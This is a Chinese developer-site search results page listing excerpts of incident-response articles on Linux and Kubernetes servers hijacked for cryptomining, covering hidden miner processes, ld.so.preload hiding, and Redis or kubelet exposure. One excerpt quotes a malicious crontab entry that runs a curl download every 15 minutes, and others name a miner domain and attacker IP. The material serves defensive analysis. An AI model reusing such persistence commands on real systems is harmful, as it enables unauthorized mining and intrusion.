首页
学习
活动
专区
工具
TVP
发布
精选内容/技术社群/优惠产品,尽在小程序
立即前往

Linux 遭入侵,挖矿进程隐藏排查记录

今天来给大家分享下这两天遇到的一个问题,服务器挖矿了,把我的排查记录分享下,希望能帮到有需要的同学。...问题原因 ---- 多台服务器持续告警CPU过高,服务器为K8s的应用节点,正常情况下CPU使用率都挺低的,通过排查是原因是挖矿了,下面为定位过程 定位过程 ---- 登陆问题主机10.92.0.X,...cpu使用率基本跑满(用户态),没有发现可疑的进程,初步怀疑可能是进程在哪里隐藏了 执行命令ps -aux --sort=-pcpu|head -10 嗯哼,藏得够深的,可还是揪出来啦 ? ?...阻断挖矿程序链接外网服务(很重要) 在/etc/hosts里增加一条 127.0.0.1 g.upxmr.com 阻断挖矿程序链接外网下载可执行文件,不加了的话干掉服务又会起来(除非把服务器网断了) 2...这次分享希望对也中挖矿程序的同学, 提供一些排查思路

7.7K30
  • 您找到你想要的搜索结果了吗?
    是的
    没有找到

    安全研究 | Linux 遭入侵,挖矿进程隐藏案例分析

    我们发现黑客主要是利用 Redis 未授权访问问题进行入侵,对于该问题的说明可以参考我们过去做的一些分析: https://mp.weixin.qq.com/s/inazTPN5mHJYnt2QDliv8w 在服务器入侵后...在变更文件里可以看到一些挖矿程序,同时 /etc/ld.so.preload 文件的变更需要引起注意,这里涉及到 Linux 动态链接库预加载机制,是一种常用的进程隐藏方法,而 top 等命令都是受这个机制影响的...在 Linux 操作系统的动态链接库加载过程中,动态链接器会读取 LD_PRELOAD 环境变量的值和默认配置文件 /etc/ld.so.preload 的文件内容,并将读取到的动态链接库进行预加载,即使程序不依赖这些动态链接库...——段落引自《警惕利用 Linux 预加载型恶意动态链接库的后门》 通过查看文件内容,可以看到加载一个 .so 文件:/usr/local/lib/libjdk.so ?...继续分析变更的文件,还能看到相关文件也变更,比如黑客通过修改 /etc/rc.d/init.d/network 文件来进行启动: ? 同时修改 /etc/resolv.conf : ?

    3.2K80

    Linux服务器植入木马挖矿该怎么处理解决

    很多客户网站服务器入侵,攻击,找到我们SINE安全公司寻求技术支持与帮助,有些网站篡改,跳转,首页内容替换,服务器植入木马后门,服务器卡顿,服务器异常网络连接,有的客户使用的是阿里云服务器,经常被提醒服务器有挖矿程序...首先我们会对当前服务器的IP,以及IP的地址,linux服务器名称,服务器的版本是centos,还是redhat,服务器的当前时间,进行收集并记录到一个txt文档里,接下来再执行下一步,对当前服务器的异常网络连接以及异常的系统进程检查...并对连接的IP,进行归属地查询,如果是国外的IP,直接记录当前进程的PID值,并自动将PID的所有信息记录,查询PID所在的linux文件地址,紧接着检查当前占用CPU大于百分之30的进程,并检查该进程所在的文件夹...对服务器的启动项进行检查,有些服务器植入木马后门,即使重启服务器也还是攻击,木马会自动的启动,检查linux的init.d的文件夹里是否有多余的启动文件,也可以检查时间,来判断启动项是否有问题。...最重要的是检查服务器的定时任务,前段时间某网站客户中了挖矿病毒,一直占用CPU,查看了定时任务发现每15分钟自动执行下载命令,crontab -l */15 * * * * (curl -fsSL https

    5.7K30

    想要“挖矿”致富?小心这些方式让你挖矿,让别人致富!

    看小电影的要小心挖矿的。 随着数字加密货币价格的持续暴涨,“发家致富靠挖矿”在币圈疯传。一时间,各种挖矿教程风靡全球,更可怕的是,很多路人看个小电影、蹭个WiFi的时候,其实已经被迫成为挖矿一员。...挖矿病毒猖獗:算力不够人数来凑 随着“挖矿”的大热,肩负着挖矿使命的病毒也跃升为今年最火的病毒,默默吃瓜的我们可能一不小心就秒变“矿工”。...根据公布的脚本可以看出,黑客主要通过入侵WIFI连接页面,使其植入挖矿代码,从而导致用户在连接WIFI时执行挖矿程。...用户只要打开这个软件就必须授予相应的权限,在软件获得权限后会自动“伪装”成为杀毒软件,表面上看起来对手机一点害处都没有,甚至还会帮助手机清理其他的流氓软件,但是一旦获取足够的权限和信任,用户就会收到乱七八糟的短信和电话,还会“订购各种服务...结语 由各类吃瓜群众“矿工”现象,挖矿大军的疯狂程度可见一斑,另外显卡市场的混乱程度也十足的体现出了“挖矿”的火热:截止目前RX 580的价格再次上涨至建议零售价的1.7倍以上,A卡全面缺货,N卡全面涨价

    2K20

    linux实战清理挖矿病毒kthreaddi

    故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...> busybox top image-20210629223207356 终于看到了这个kthreaddi进程,上网一查这个东西叫门罗币挖矿木马,伪装的实现是太好了和系统中的正常进程kthreadd...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 image-20210629224536853 原来在 tmp下面有文章 ,但是 deleted...pid reboot重启 总结 本次服务器挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,入侵。

    2K31

    linux实战清理挖矿病毒 kthreaddi

    故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 [image-20210629224536853] 原来在 tmp下面有文章 ,但是 deleted...pid reboot重启 总结 本次服务器挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html

    1.8K00

    Linux应急响应(三):挖矿病毒

    0x00 前言 随着虚拟货币的疯狂炒作,利用挖矿脚本来实现流量变现,使得挖矿病毒成为不法分子利用最为频繁的攻击方式。...新的挖矿攻击展现出了类似蠕虫的行为,并结合了高级攻击技术,以增加对目标服务器感染的成功率,通过利用永恒之蓝(EternalBlue)、web攻击多种漏洞(如Tomcat弱口令攻击、Weblogic WLS...组件漏洞、Jboss反序列化漏洞、Struts2远程命令执行等),导致大量服务器感染挖矿程序的现象 。...D、漏洞修复 升级struts到最新版本 0x03 防范措施 针对服务器感染挖矿程序的现象,总结了几种预防措施: 1、安装安全软件并升级病毒库,定期全盘扫描,保持实时防护 2、及时更新 Windows

    2K30

    linux实战清理挖矿病毒kthreaddi

    故事背景 最新收到报警消息,一直提示服务器CPU 100%,然后登入服务器用top一看,发现并没有进程特别占用CPU,马上第一直觉就是top命令已经篡改。需要借助其他的工具。...安装busybox 系统有故障,登录后如果发现用正常的命令找不到问题,那么极有可能该命令篡改。 BusyBox 是一个集成了三百多个最常用Linux命令和工具的软件,里面就有我需要的top命令。...去内核数据目录找找看 > ls -al ll /proc/6282 6282是刚才那个挖矿进程 图片 原来在 tmp下面有文章 ,但是 deleted,不管先去看看 > /tmp/.dHyUxCd...本次服务器挖矿,有可能是docker没有TLS通讯加密,也有可能是redis的弱密码,入侵。...原文链接:https://rumenz.com/rumenbiji/linux-kthreaddi.html

    2.3K31

    应急响应系列之OA入侵挖矿分析报告

    对于 Linux 安全检查,个人上段时间写了个 shell 用于一键进行 Linux 安全检查,本文对 Linux 的检查使用相关脚本均可实现,相关链接如下: https://mp.weixin.qq.com...,某用户 OA 360 浏览器提示「网站存在数字货币挖矿行为」,我司应急响应小组进行分析后确认为真实事件,随后进行黑客入侵分析。...2.1 入侵现象 2018 年 11 月 8 日,我司「捕影」应急响应小组接到驻场团队反馈,某用户 OA 360 浏览器提示「网站存在数字货币挖矿行为」,具体情况如下所示: ?...图 2-OA 加载 JS 脚本 对这一 JS 脚本进行分析,发现该脚本的确植入 JS 挖矿脚本,具体如下: ? 图 3-OA 加载挖矿脚本 ? 图 4-挖矿 JS 代码功能 ?...2.3 系统分析 服务器植入挖矿脚本说明服务器肯定被黑客入侵了,由于目前 OA 系统服务器仅 6001 端口对互联网开放,因此通过 web 应用入侵的可能性比较大。

    1.1K10

    服务器挖矿木马攻击该怎么处理

    这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器挖矿木马攻击的时候可以应急处理,让损失降到最低。 ?...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP...针对服务器挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

    4.1K20

    产线环境 Kubernetes 集群入侵挖矿排查思路

    近期遇到了一次我们自建Kubernetes集群中某台机器入侵挖矿, 后续也找到了原因, 所幸只是用来挖矿… 网络安全是个严肃的问题, 它总是在不经意间出现, 等你反应过来却已经迟了....入侵现象 检查到某台机器中出现了异常进程 简单来讲, 就是我们的机器用来挖矿了… 问题出现后, 我们第一时间关闭了docker, 其实应该隔离下环境, 把挖矿程序dump下来, 以便后续分析....具体原因排查 iptables为空 出现了异常进程, 肯定是入侵了, 我首先看的是iptables....果不其然, 机器上的iptables规则是空的, 意味着这台机器在裸奔. kubelet裸奔 内部同事提出了有可能是kubelet入侵的问题, 检查过其他组件后, 开始检查kubelet组件 最后检查到...kubelet日志中有异常: kubelet设置不当 确认入侵问题, kubelet参数设置错误, 允许直接访问kubelet的api 发现是kubelet的启动项中, 该位置注释掉: 然后文件中禁止匿名访问的配置没有读取

    96940

    服务器挖矿木马攻击该怎么处理

    这个挖矿木马我们可以命名为猪猪挖矿,之所以这样起名也是觉得攻击的特征,以及繁衍感染的能力太强,我们称之为猪猪挖矿木马。...关于如何检测以及防护挖矿木马,我们通过这篇文章来给大家讲解一下,希望大家能够日后遇到服务器挖矿木马攻击的时候可以应急处理,让损失降到最低。...挖矿木马是2018年底开始大批量爆发的,我们对猪猪挖矿进行了详细的跟踪与追查分析,主要是通过thinkphp的网站漏洞进行攻击服务器,然后在服务器里置入木马后门,以及挖矿木马,该木马的特征如下:内置了许多木马后门...攻击者最初使用的是thinkphp5的漏洞来攻击网站,然后通过网站的权限来拿到服务器的root权限,挖矿的基本都是linux centos服务器,然后置入到linux系统里木马进程,并将58.65.125.98IP...针对服务器挖矿木马攻击的处理及安全解决方案 尽快的升级thinkphp系统的版本,检测网站源代码里是否留有攻击者留下的木马后门,对网站开启硬件防火墙,随时的检测攻击,使用其他网站开源系统的运营者,建议尽快升级网站系统到最新版本

    3K10

    服务器挖矿了的解决办法

    17年慢慢爆炸后,挖矿木马慢慢变成互联网的主要危害之一。...网站服务器如果挖矿木马团伙攻陷,正常业务服务的性能将遭受严重影响,挖矿木马会被感染,也代表着网站服务器权限hack攻陷,公司的机密信息可能会泄露,攻击者也可能同时彻底破坏数据。 ?...挖矿木马作为现阶段服务器面临的最普遍的危害之一,是检测企业安全防御机制、环境和技术能力水平的试金石。...如何有效应对这种安全危害,在此过程中促进公司网络安全能力的提高,必须变成企业安全管理者和网络安全厂商的共同目标,快过年了,挖矿木马植入的服务器越来越多,导致很多网站或APP无法正常运行,如果想要彻底解决的话建议到服务器安全公司来处理解决...Linux网站服务器SSH、WindowsSQLServer等服务器访问入口设置高强度的登录密码,Redis、HadoopYarn、Docker、XXL-JOB、Postgres等应用程序增加许可证,控制访问对象

    3.5K10
    领券